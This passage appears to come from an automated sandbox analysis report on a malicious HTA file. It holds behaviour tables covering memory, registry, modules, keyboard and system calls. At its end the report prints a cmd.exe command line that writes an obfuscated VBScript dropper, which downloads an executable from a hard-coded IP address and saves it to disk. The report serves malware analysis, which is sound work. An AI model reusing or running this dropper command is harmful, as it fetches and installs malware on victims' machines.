| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 53 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\axvha[1].hta | 2.06 KB |
MD5:
a023dc3a00568eb4317a6c3f997eff7f
SHA1: 009bdae55011c854762a748ba20e6b34ef47cf77 SHA256: 53c8316c3caa1c4aa5280e1a33f4e80b76040e9f91ad6d469b9006a93c64f5f9 SSDeep: 48:r+MJVP2ajnVZcAa2ucVwQS1QSD1IhMzG9PGGfYVQGXc12kBNqV1bh2nHJKPf:rP1CjGlkZcjKX |
|
|
Host Behavior
COM (5)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 3050F5C8-98B5-11CF-BB82-00AA00BDCE0B | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50D5107A-D278-4871-8989-F4CEAAF59CFC | 08C0E040-62D1-11D1-9326-0060B067B86E | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | BB1A2AE1-A4F9-11CF-8F20-00805F2CD064 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | Shell.Application | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open Mapping | #MSHTML#PERF#00000BF0 | desired_access = FILE_MAP_WRITE |
|
1 |
Registry (111)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CODEPAGE_INHERIT | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 | data = C:\Windows\SysWOW64\mshtml.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | value_name = NoFileMenu, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup | value_name = Print_Background |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | show_window = 48599680 |
|
1 |
Module (104)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\SysWOW64\mshtml.dll | base_address = 0x74790000 |
|
1 | |
| Load | comctl32.dll | base_address = 0x745f0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76720000 |
|
1 | |
| Load | mshtml.dll | base_address = 0x74790000 |
|
1 | |
| Load | OLEACC.DLL | base_address = 0x74360000 |
|
1 | |
| Load | ieframe.dll | base_address = 0x73870000 |
|
2 | |
| Load | oleaut32.dll | base_address = 0x76720000 |
|
1 | |
| Get Handle | c:\windows\syswow64\mshta.exe | base_address = 0x680000 |
|
2 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
5 | |
| Get Handle | c:\windows\syswow64\kernelbase.dll | base_address = 0x75f40000 |
|
26 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Get Handle | EXPLORER.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | IEXPLORE.EXE | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x76720000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshta.exe, size = 260 |
|
4 | |
| Get Filename | C:\Windows\SysWOW64\mshtml.dll | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshtml.dll, size = 260 |
|
1 | |
| Get Filename | c:\windows\syswow64\mshta.exe | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76234f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76231252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76234208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7623359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = EncodePointer, address_out = 0x77e60fcb |
|
9 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = DecodePointer, address_out = 0x77e59d35 |
|
17 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75f5004f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSetInformation, address_out = 0x76235651 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventWrite, address_out = 0x77e80c59 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventRegister, address_out = 0x77e5f6ba |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = EventUnregister, address_out = 0x77e79241 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RegisterApplicationRestart, address_out = 0x7625b53c |
|
1 | |
| Get Address | c:\windows\syswow64\mshtml.dll | function = RunHTMLApplication, address_out = 0x747ee710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSRWLock, address_out = 0x77e58456 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77e529f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockShared, address_out = 0x77e52560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77e529ab |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockShared, address_out = 0x77e525a9 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 6, address_out = 0x76723e59 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 7, address_out = 0x76724680 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 8, address_out = 0x76723ed5 |
|
1 | |
| Get Address | Unknown module name | function = LresultFromObject, address_out = 0x74362663 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 2, address_out = 0x76724642 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetClassObject, address_out = 0x75d254ad |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantClear, address_out = 0x76723eae |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 201, address_out = 0x76724af8 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 16 |
|
1 | |
| Map | - | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE |
|
1 |
Window (9)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 1959564928 |
|
1 | |
| Create | - | class_name = HTML Application Host Window Class, wndproc_parameter = 1959564928 |
|
1 | |
| Create | - | wndproc_parameter = 0 |
|
1 | |
| Create | - | wndproc_parameter = 8736600 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
2 | |
| Set Attribute | - | index = 18446744073709551595, new_long = 8736600 |
|
1 | |
| Set Attribute | - | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 | |
| Set Attribute | - | index = 18446744073709551595, new_long = 0 |
|
1 |
Keyboard (98)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID |
|
2 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_MENU, result_out = 0 |
|
16 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
10 | |
| Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
6 | |
| Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
6 | |
| Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
6 |
System (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 1429, y_out = 7 |
|
1 | |
| Get Cursor | x_out = 220, y_out = 696 |
|
10 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
4 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-11-27 09:37:01 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 133474 |
|
1 | |
| Get Time | type = Ticks, time = 136001 |
|
1 | |
| Get Time | type = Ticks, time = 136017 |
|
10 | |
| Get Time | type = Ticks, time = 136032 |
|
2 | |
| Get Time | type = Ticks, time = 136204 |
|
1 | |
| Get Time | type = Ticks, time = 136563 |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | - |
|
3 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Local\!PrivacIE!SharedMemory!Mutex |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Ini (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 |
Process #7: cmd.exe
382
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject("wscript.shell") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = "http://82.118.242.107/~able/1_ga/al/al.exe" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = "JSTCHV.eXe" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject("MSXML2.XMLHTTP") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open "GET", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send ("") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject("ADODB.Stream") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close 